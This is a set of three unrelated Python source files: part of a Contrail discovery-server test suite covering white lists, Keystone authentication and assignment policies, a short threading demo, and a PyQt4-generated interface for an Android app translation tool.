client_subscribed_service_id = self.ds_obj.get_subscribed_service_id(\
ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id(\
ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.info("\n# The publishers mentioned in service-in-use list are %s\n\
and the client is actually subscribed to following publishers %s.######## " \
% (self.inputs.cfgm_control_ips,service_IPs))
if instances_allocated == len(self.inputs.cfgm_control_ips) and \
sum_in_use_aftr_subscribe_request > sum_in_use_bfr_subscribe_request:
self.logger.info("\n# The subscribe request with instance as 0 \n\
and service-in-use list has subscribed to expected publishers.######## ")
else:
self.logger.info("\n# Something went wrong. \n \
Expected Publishers not assigned to client request having service in use list ######## ")
result=False
self.logger.info("\n##### Waiting for 30 seconds so that dummy client request\n \
            ages out and does not interfere with other test cases ######")
sleep(30)
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_white_list_security(self):
        ''' To prevent unauthorized publish or subscribe requests from affecting
        discovery server state (and assuming such requests come through a
        load-balancer such as ha-proxy), the discovery server applies the configured
        publish and subscribe white-lists to incoming IP addresses as obtained
        from the X-Forwarded-For header.
Load-Balancer must be enabled to forward client's real IP address
in X-Forwarded-For header to discovery servers.
Steps:
1. Configure subscriber and publisher white list and save it in
contrail-discovery.conf file.
2. Send publish/subscribe requests with X-Forwarded-for headers with
IPs same as present in white list
3. Verify that publish/subscribe requests are processed correctly
by discovery server
4. Send publish/subscribe requests with X-Forwarded-for headers
with IPs not present in white list
5. Verify that publish/subscribe requests are rejected by discovery server.
6. Delete the white list configurations from contrail-discovery.conf file.
7. Send publish/subscribe requests with X-Forwarded-for headers
with IPs not present in white list
8. Verify that publish/subscribe requests are processed correctly
by discovery server
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n # Configure white list for publishers\n \
and subscriber in contrail-discovery.conf file # ")
self.ds_obj.white_list_conf_file("publisher", '1.1.1.0/24', '2.2.2.0/24')
self.ds_obj.white_list_conf_file("subscriber", '1.1.1.0/24', '2.2.2.0/24')
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json'\
, 'X-Forwarded-For': "1.1.1.1"}
self.logger.info("Sending a synthetic publish request to verify publishers white list")
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_1",ip="1.1.1.1", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip, service="Test_Pub_1")==[]:
result = False
self.logger.error("\n#### Failure!! The requested publish request\n\
not accepted by discovery server even if the IP was present in\n \
Publisher white list ###")
else:
self.logger.info("\n#### Success!! The requested publish request\n\
accepted by discovery server as IP was present in Publisher white list")
sleep(2)
DiscoveryServerUtils.POST_HEADERS = {'Content-type': 'application/json',\
'X-Forwarded-For': "3.3.3.3"}
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_2",ip="3.3.3.3", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip,\
service="Test_Pub_2") == []:
self.logger.info("\n#### Success!! The requested publish request\n\
not accepted by discovery as IP was not present in Publisher white list")
else:
result = False
self.logger.error("\n#### Failure!! The requested publish request\n\
accepted by discovery server even if the IP was not present in Publisher white list")
self.logger.info("Sending a synthetic subscribe request to verify subscribers white list")
DiscoveryServerUtils.POST_HEADERS = {'Content-type': 'application/json',\
'X-Forwarded-For': "2.2.2.2"}
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2", client_id=self.inputs.compute_names[0]+\
":TestClient_1",remote_addr=self.inputs.compute_control_ips[0],\
client_type= "TestClient_1")
if self.ds_obj.get_subscribed_service_id(ds_ip,client=(\
self.inputs.compute_control_ips[0], "TestClient_1"),\
service="IfmapServer") == []:
result = False
self.logger.error("\n#### Failure!! The requested subscribe request\n\
not accepted by discovery server even if the IP was present\n\
in Subscriber white list ###")
else:
self.logger.info("\n#### Success!! The requested subscribe request\n\
accepted by discovery server as IP was present in Subscriber white list")
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json',\
'X-Forwarded-For': "3.3.3.3"}
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2",client_id=self.inputs.compute_names[0]+
":TestClient_2",remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient_2")
if self.ds_obj.get_subscribed_service_id(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient_2"), service="IfmapServer") == []:
self.logger.info("\n#### Success!! The requested subscribe request \n\
not accepted by discovery server as IP was not present in Subscriber white list")
else:
result = False
self.logger.error("\n#### Failure!! The requested subscribe request\n\
accepted by discovery server even if the IP was not present in Subscriber white list")
self.logger.info("Deleting the configurations of white list to clean up for next test case")
assert self.ds_obj.modify_discovery_conf_file_params( 'delete_white_list',\
publish=True, subscribe=True)
self.logger.info("\n# Verify that when white list is deleted, \n\
then X-Forwarded-Header does not hold relevance and all requests are accepted")
response = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="Test_Pub_2",ip="3.3.3.3", port ="123")
if self.ds_obj.get_all_services_by_service_name(ds_ip, service="Test_Pub_2") == []:
result = False
self.logger.error("\nFailure!! The requested publish request \n\
not accepted by discovery server even after deleting publish white list")
else:
self.logger.info("\n#### Success!! The requested publish request\n\
accepted by discovery server as Publisher white list has been deleted")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="2",client_id=self.inputs.compute_names[0]+\
":TestClient_2",remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient_2")
if self.ds_obj.get_subscribed_service_id(ds_ip,client=(self.inputs.compute_control_ips[0],\
"TestClient_2"), service="IfmapServer") == []:
result = False
self.logger.error("\nFailure!! The requested subscribe request\n\
not accepted by discovery server even if Subscriber white list has been deleted")
else:
self.logger.info("\nSuccess!! The requested subscribe request\n\
accepted by discovery server as Subscriber white list has been deleted")
self.logger.info("\nWaiting for 30 seconds so that dummy client request\n\
            ages out and does not interfere with other test cases ######")
sleep(30)
except Exception as e:
self.logger.error(e)
result = False
DiscoveryServerUtils.POST_HEADERS={'Content-type': 'application/json'}
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_keystone_auth_security(self):
'''
Discovery server to require admin keystone credentials to perform
load-balance and setting of admin state. Discovery server will expect
admin token in X-Auth-Token header of incoming request. The token
is sent to keystone for validation and action is only performed if a
valid admin token is present. Otherwise 401 HTTP code is returned
Steps:
        1. Configure authentication as keystone in contrail-discovery.conf file.
Don't configure the credentials
2. Attempt admin-state change, oper-state change and load-balance
trigger and expect them to fail as only auth has been configured.
        3. Configure authentication as keystone in contrail-discovery.conf file.
Configure the credentials as well.
4. Attempt admin-state change, oper-state change and load-balance
        trigger and expect them to pass as auth and its credentials have
been configured.
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.info("# Configure authentication as *True* in contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params('add_keystone_auth',\
auth="keystone", add_values = "False")
self.logger.debug("#Verify that all requests fails if Auth is True and credentials are not mentioned#")
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="oper-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response != 200:
self.logger.info("\nSuccess!! As authetication is True and credentials are not configured,\n\
the oper-state change request has failed")
else:
self.logger.error("\nFailure!! Even if authetication is True and credentials are not configured,\n\
the oper-state change request is successful")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="admin-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response != 200:
self.logger.info("\nSuccess!! As authetication is True and credentials are not configured,\n\
the admin-state change request has failed")
else:
self.logger.error("\nFailure!! Even if authetication is True and credentials are not configured,\n\
the admin-state change request is successful")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="load-balance",service_id=\
self.inputs.cfgm_names[0],service_type="IfmapServer")
if response != 200:
self.logger.info("\n Success!! As authetication is True and credentials are not configured,\n\
the load-balance request has failed")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are not configured,\n\
the load-balance request is successful")
result = False
self.logger.info("\n # Configure authentication as *True* as well as \n \
configuring all the required credentials in contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params(operation='add_keystone_auth',\
auth="keystone", add_values = "True")
self.logger.info("\n # Verify that all requests are passed if Auth is True\n\
and credentials are mentioned # ")
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="oper-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the oper-state change request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the oper-state change request has failed")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip\
,operation="admin-state",operation_status="up",\
service_id=self.inputs.cfgm_names[0],\
service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the admin-state change request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the admin-state change request has failed")
result = False
response = self.ds_obj.publish_requests_with_keystone(ds_ip,\
operation="load-balance",service_id=\
self.inputs.cfgm_names[0],service_type="IfmapServer")
if response == 200:
self.logger.info("\n Success!! As authetication is True and credentials are configured,\n\
the load-balance request has been processed successfully")
else:
self.logger.error("\n Failure!! Even if authetication is True and credentials are configured,\n\
the load-balance request has failed")
result = False
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("# Deleting the auth configurations from contrail-discovery.conf file # ")
assert self.ds_obj.modify_discovery_conf_file_params(operation='delete_keystone_auth'\
,auth="keystone")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_policy_fixed(self):
'''
This test case is specifically written to automate Bug "#1401304 :
discovery fixed policy breaks if service stays down for extended period"
Discovery has fixed policy for service assignment in which services
are assigned to consumers in a fixed, static or constant manner.
For example if there are "n" publishers of a service and there are
"m" consumers that are interested in "k" instances (say 2) of service,
then all "m" consumers will get <n0, n1, n2 ... nk> service instances.
This is akin to priority order.
If an instance, say "ni" such that 0 <= i <= k went down for an
extended period (> 15 seconds) and comes back up, it should no longer
be assigned to a new consumer because it should go to the bottom of
the prioritized list.
It should not retain its position.
Steps:
1. Set the policy of publisher named TEST_PUB as fixed in
contrail-discovery.conf file.
2. Create 3 different synthetic Publisher request of Publisher named
TEST_PUB.
3. Create 3 different synthetic Subscribe request asking for 2 instances
of TEST_PUB each. Verify that policy as fixed works as expected.
4. Now make one of the publisher which was used by subscribers as
down for more than extended period.
5. Again send 3 different synthetic requests asking for 2 instances
each and verify that the publisher which was made down is not
        assigned to the clients as its priority got reduced in the earlier step.
'''
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params(operation='change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("#### Making policy as *fixed* for test publisher ##")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="TEST_PUB",policy='fixed')
self.logger.info("#### Sending 3 synthetic publish requests of same Publisher type ###")
def publish_request():
for i in range(0,100):
response_1 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="1.1.1.1",port="123")
response_2 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="2.2.2.2",port="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3",port="123")
sleep(5)
obj_1 = Process(target=publish_request)
obj_1.start()
sleep(1)
if self.ds_obj.get_service_status(ds_ip,\
service_tuple=("1.1.1.1","TEST_PUB")) == "up" \
and self.ds_obj.get_service_status(ds_ip,\
service_tuple=("2.2.2.2","TEST_PUB")) == "up" \
and self.ds_obj.get_service_status(ds_ip,\
service_tuple=("3.3.3.3","TEST_PUB")) == "up":
self.logger.info("#### All publishers have registered to discovery server successfully.###")
else:
self.logger.error("\n#### Either or all Publishers have not registered to discovery server.\n \
No sense of proceeding the test case. Exiting. ###")
self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="TEST_PUB")
obj_1.terminate()
result = False
assert result
self.logger.info("\n#### Sending 3 synthetic subscribe requests with instance value 2\n \
to subscribe to Publisher *TEST_PUB* ###")
self.ds_obj.subscribe_service_from_discovery(ds_ip,service="TEST_PUB",\
instances="2",client_id="1.1.1.1:TestClient",\
remote_addr= "1.1.1.1", client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip,service="TEST_PUB",\
instances="2",client_id="2.2.2.2:TestClient",\
remote_addr= "2.2.2.2", client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="3.3.3.3:TestClient",\
remote_addr= "3.3.3.3", client_type= "TestClient")
self.logger.debug("#### Verifying the in use count of publishers are subscribe request ###")
p1_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("1.1.1.1","TEST_PUB"))
p2_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("2.2.2.2","TEST_PUB"))
p3_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("3.3.3.3","TEST_PUB"))
publisher_in_use_list=[p1_in_use_count,p2_in_use_count,p3_in_use_count]
if sum(publisher_in_use_list) == 6 and 0 in publisher_in_use_list:
self.logger.info("\n#### Clients subscribed successfully to publishers\n \
and policy as *fixed* working as expected ##")
else:
self.logger.error("#### Subscription not as expected. The in use list looks like %s ##"\
% publisher_in_use_list)
result = False
self.logger.debug("\n#### Stopping one of the in use Publisher for extended period\n \
(> 15 seconds) to decrease it's priority ##")
obj_1.terminate()
index_first_pub_used = publisher_in_use_list.index(3)
def new_publish_request():
for i in range(0,100):
if index_first_pub_used == 0:
response_2 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="2.2.2.2", port ="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3", port ="123")
elif index_first_pub_used == 1:
response_1 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="1.1.1.1", port ="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3", port ="123")
sleep(5)
new_obj=Process(target =new_publish_request)
new_obj.start()
self.logger.debug("#### Waiting for 60 seconds so that all subscriptions are lost ##")
sleep(60)
self.logger.debug("\n#### Again starting the stopped publishers\n \
and hoping that its priority has been reduced and it will not be used by the clients any more##")
new_obj.terminate()
obj_2 = Process(target=publish_request)
obj_2.start()
sleep(1)
self.logger.info("\n#### Again sending 3 synthetic subscribe requests\n \
with instance value 2 to subscribe to Publisher *TEST_PUB* ###")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="1.1.1.1:TestClient",\
remote_addr= "1.1.1.1",client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="2.2.2.2:TestClient",\
remote_addr= "2.2.2.2",client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="3.3.3.3:TestClient",\
remote_addr= "3.3.3.3",client_type= "TestClient")
self.logger.debug("#### Verifying the in use count of publishers are subscribe request ###")
p1_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("1.1.1.1","TEST_PUB"))
p2_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("2.2.2.2","TEST_PUB"))
p3_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("3.3.3.3","TEST_PUB"))
publisher_in_use_list=[p1_in_use_count,p2_in_use_count,p3_in_use_count]
            if sum(publisher_in_use_list) == 6 and publisher_in_use_list[index_first_pub_used] == 0:
self.logger.info("\n#### Clients subscribed successfully to publishers\n \
and policy as *fixed* working as expected ##")
self.logger.info("\n#### Clients not subscribed to publisher \n \
                which went down for more than the extended period as its priority has been decreased ##")
else:
self.logger.error("#### Subscription not as expected. The in use list looks like %s ##"\
% publisher_in_use_list)
self.logger.error("\n#### Clients might have subscribed to publisher which went down.\n \
This means priority of that publisher was not decreased ##")
result = False
obj_2.terminate()
self.logger.info("#### Deleting the policy configurations from .conf file ##")
assert self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="TEST_PUB")
self.logger.debug("#### Waiting for dummy Publish and subscribe requests to expire ##")
sleep(30)
self.ds_obj.cleanup_service_from_discovery(ds_ip)
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_do_not_affect_other_dns_subscriptions(self):
'''
This test case is specifically written to automate Bug
"#1548638 : [Discovery-Rel3.0-Centos-1]: All clients re-subscribe
to a different publisher when a rule is added which was supposed
to affect only 1 subscriber (No Auto load balance) "
Steps:
        1. Search for the DNS-Server to which vrouter agents are subscribed.
        2. Create a rule entry for any one of the vrouter agents and Publishers.
3. Again search for DNS-Server to which vrouter agent is subscribed to
and match it to values before creating rule.
        Precondition: Assumption is that the setup has a vrouter connected
        to 2 instances of DNS servers running in different subnets.
        This test case also requires at least 2 publishers and 2 subscribers,
        with each set of publishers and subscribers in a different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Finding the subscriptions of all vrouter-agents to DNS-server before creating a rule# ")
all_vrouter_pub_IPs_bfr_rule = []
for i in range(0,len(self.inputs.compute_control_ips)):
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[i],\
"contrail-vrouter-agent:0"),service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for k in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[k])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("Contrail-vrouter-agent running on %s is subscribed to DNS-server running at %s" \
% (self.inputs.compute_control_ips[i],service_IPs))
all_vrouter_pub_IPs_bfr_rule.append(service_IPs)
self.logger.info("## Creating a rule for 1 of the vrouter-agent subscriber")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriptions to happens###")
sleep (30)
self.logger.info("# Finding the subscriptions of all vrouter-agents to DNS-server after creating a rule# ")
all_vrouter_pub_IPs_aftr_rule = []
for i in range(0,len(self.inputs.compute_control_ips)):
client_subscribed_service_id=self.ds_obj.get_subscribed_service_id(ds_ip,\
client=(self.inputs.compute_control_ips[i],\
"contrail-vrouter-agent:0"),service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for k in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[k])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("Contrail-vrouter-agent running on %s is subscribed to DNS-server running at %s" \
% (self.inputs.compute_control_ips[i],service_IPs))
all_vrouter_pub_IPs_aftr_rule.append(service_IPs)
if all_vrouter_pub_IPs_aftr_rule[0][0] == self.inputs.bgp_control_ips[0] \
and len(all_vrouter_pub_IPs_aftr_rule[0]) == 1:
self.logger.debug("The rule has worked properly")
for i in range(1,len(all_vrouter_pub_IPs_aftr_rule)):
if all_vrouter_pub_IPs_aftr_rule[i] == all_vrouter_pub_IPs_bfr_rule[i]:
self.logger.debug("No change has happened in other subscriptions due to rule.")
else:
result = False
self.logger.error("\n The publisher assigned to contrail-vrouter\n \
running on %s were %s and has changed to %s"\
% (self.inputs.compute_control_ips[i],\
all_vrouter_pub_IPs_bfr_rule[i],all_vrouter_pub_IPs_aftr_rule[i]))
else:
self.logger.error("Rule has not worked as expected")
self.logger.debug("Subscriber %s has subscribed to %s Publisher instead of subscribing only to %s"\
% (self.inputs.compute_control_ips[i],\
all_vrouter_pub_IPs_aftr_rule[0],self.inputs.bgp_control_ips[0]) )
result = False
self.logger.info("# Deleting the rule after the test is complete # ")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
assert result, "Test case failed due to some error. Please refer to logs"
# end TestDiscoveryFixture
|
multiThreading.py
|
import time
import threading
def calc_sqr(ar):
for i in ar:
time.sleep(0.2)
print("square:", i*i)
def calc_cube(ar):
for i in ar:
time.sleep(0.2)
print("cube:", i*i*i)
ar = [2, 4, 8, 9]
t = time.time()
t1 = threading.Thread(target=calc_sqr, args=(ar,))
t2 = threading.Thread(target=calc_cube, args=(ar,))
t1.start()
t2.start()
t1.join()
t2.join()
print("done in", time.time()-t)
|
AAT.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'AAT.ui'
#
# Created: Wed Sep 09 12:06:25 2015
# by: PyQt4 UI code generator 4.9.6
#
# WARNING! All changes made in this file will be lost!
'''
* Copyright (C) 2015 Francisco Javier <https://mx.linkedin.com/in/fcojavierpena>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
import os
import threading
import warnings
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QFileDialog
import goslate
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import StaticPool
from Export import ExportData
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(QtGui.QWidget):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(500, 273)
MainWindow.setFixedSize(500, 273)
MainWindow.setStyleSheet(_fromUtf8("QWidget#centralwidget{background-color: qlineargradient(spread:pad, x1:1, y1:1, x2:1, y2:0, stop:0 rgba(186, 186, 186, 255), stop:0.781095 rgba(235, 235, 235, 255));}\n"
"\n"
"QToolButton, QToolButton:pressed{\n"
"\n"
"background-color:transparent;\n"
"border:none;\n"
"color: rgb(156, 156, 156);\n"
"\n"
"}\n"
"\n"
"QToolButton:checked, QToolButton:pressed{\n"
"\n"
"background-color:rgb(219,218,206);\n"
"border: 1px solid rgb(255, 255, 255);\n"
"\n"
"}\n"
"\n"
"QToolButton:hover{\n"
"\n"
"background-color:rgb(89,209,171);\n"
"\n"
"}\n"
"\n"
"\n"
"QToolButton:checked:hover{\n"
"\n"
"background-color:rgb(219,218,206);\n"
"\n"
"}\n"
"\n"
" QPushButton {\n"
"font: 75 14pt \"Segoe UI Light\";\n"
" background-color: rgb(0, 150, 136);\n"
" color: rgb(255, 255, 255);\n"
" border-width: 2px;\n"
" border-radius: 10px;\n"
" border-color: rgb(0, 150, 136);\n"
" font: bold 16px;\n"
" min-width: 10em;\n"
" padding: 6px;\n"
" }\n"
" QPushButton:pressed {\n"
" background-color: rgb(77,182, 172);\n"
" }\n"
"\n"
"QLineEdit {\n"
"\n"
" border-style: solid;\n"
" border: 2px solid gray;\n"
" border-radius: 8px;\n"
" \n"
" color: rgb(159, 159, 159);\n"
" font: 75 14pt \"Segoe UI Light\";\n"
" border-width: 2px;\n"
" border-radius: 10px;\n"
" min-width: 10em;\n"
" padding: 6px;\n"
"\n"
" }\n"
"\n"
"QLabel{\n"
"font: 63 15pt \"Segoe UI Light\";\n"
"color: rgb(156, 156, 156);\n"
"}\n"
"\n"
"QGroupBox{\n"
"color: rgb(156, 156, 156);\n"
"}\n"
"\n"
"QProgressBar {\n"
" border: 2px solid grey;\n"
" border-radius: 5px;\n"
" text-align: center;\n"
" }\n"
"\n"
" QProgressBar::chunk {\n"
" background-color: #05B8CC;\n"
"background-color: rgb(0, 150, 136);\n"
" width: 20px;\n"
" }\n"
"QCheckBox{\n"
"font: 63 15pt \"Segoe UI Light\";\n"
"color: rgb(0, 150, 136);\n"
"}\n"
"\n"
"\n"
"/* QComboBox STYLE */\n"
"\n"
"QComboBox {\n"
" border: 1px solid gray;\n"
" border-radius: 3px;\n"
" padding: 1px 18px 1px 3px;\n"
" min-width: 5em;\n"
" height: 30px;\n"
" font: 63 15pt \"Segoe UI Light\";\n"
"}\n"
"\n"
"QComboBox:editable {\n"
" background: white;\n"
"}\n"
"\n"
"QComboBox:!editable, QComboBox::drop-down:editable {\n"
" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n"
" stop: 0 #E1E1E1, stop: 0.4 #DDDDDD,\n"
" stop: 0.5 #D8D8D8, stop: 1.0 #D3D3D3);\n"
"}\n"
"\n"
"/* QComboBox gets the \"on\" state when the popup is open */\n"
"QComboBox:!editable:on, QComboBox::drop-down:editable:on {\n"
" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n"
" stop: 0 #D3D3D3, stop: 0.4 #D8D8D8,\n"
" stop: 0.5 #DDDDDD, stop: 1.0 #E1E1E1);\n"
"}\n"
"\n"
"QComboBox:on { /* shift the text when the popup opens */\n"
" padding-top: 3px;\n"
" padding-left: 4px;\n"
"}\n"
"\n"
"QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 15px;\n"
"\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
"}\n"
"\n"
"\n"
"QComboBox::down-arrow:on { /* shift the arrow when popup is open */\n"
" top: 1px;\n"
" left: 1px;\n"
"}"))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.btImportRes = QtGui.QPushButton(self.centralwidget)
self.btImportRes.setGeometry(QtCore.QRect(260, 120, 222, 51))
self.btImportRes.setStyleSheet(_fromUtf8(" QPushButton:pressed {\n"
" background-color: rgb(0,151, 167);\n"
" }\n"
" QPushButton{\n"
"background-color: rgb(1, 87, 155);\n"
"}\n"
""))
self.btImportRes.setObjectName(_fromUtf8("btImportRes"))
self.lbTo = QtGui.QLabel(self.centralwidget)
self.lbTo.setGeometry(QtCore.QRect(30, 130, 131, 21))
self.lbTo.setObjectName(_fromUtf8("lbTo"))
self.btExportFile = QtGui.QPushButton(self.centralwidget)
self.btExportFile.setGeometry(QtCore.QRect(260, 190, 222, 51))
self.btExportFile.setStyleSheet(_fromUtf8("\n"
" QPushButton:pressed {\n"
" background-color: rgb(0,150, 136);\n"
" }\n"
" QPushButton{\n"
"background-color: rgb(0, 191, 165);\n"
"}\n"
"\n"
""))
self.btExportFile.setObjectName(_fromUtf8("btExportFile"))
self.lbProcess = QtGui.QLabel(self.centralwidget)
self.lbProcess.setGeometry(QtCore.QRect(10, 10, 481, 91))
self.lbProcess.setStyleSheet(_fromUtf8(" border: 2px solid #B2DFDB;"))
self.lbProcess.setTextFormat(QtCore.Qt.AutoText)
self.lbProcess.setAlignment(QtCore.Qt.AlignCenter)
self.lbProcess.setWordWrap(True)
self.lbProcess.setObjectName(_fromUtf8("lbProcess"))
self.comboTo = QtGui.QComboBox(self.centralwidget)
self.comboTo.setGeometry(QtCore.QRect(20, 160, 221, 51))
self.comboTo.setObjectName(_fromUtf8("comboTo"))
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Android App Translate", None))
self.btImportRes.setText(_translate("MainWindow", "Import string resource", None))
self.lbTo.setText(_translate("MainWindow", "Translate to", None))
self.btExportFile.setText(_translate("MainWindow", "Export", None))
self.lbProcess.setText(_translate("MainWindow", "Android Application Translate", None))
#QtCore.QObject.connect(self.comboFrom, QtCore.SIGNAL("currentIndexChanged(int)"), self.onItemFromSelected)
QtCore.QObject.connect(self.comboTo, QtCore.SIGNAL("currentIndexChanged(int)"), self.onItemToSelected)
QtCore.QObject.connect(self.btExportFile, QtCore.SIGNAL("clicked()"), self.exportFile)
QtCore.QObject.connect(self.btImportRes, QtCore.SIGNAL("clicked()"), self.selectResourceString)
dataLanguages = {}
fromKey = ""
toKey = ""
def onItemToSelected(self, item):
self.toKey = ""
selectedLanguage = self.comboTo.currentText()
self.toKey = self.dataLanguages[str(selectedLanguage)]
def onItemFromSelected(self, item):
self.fromKey = ""
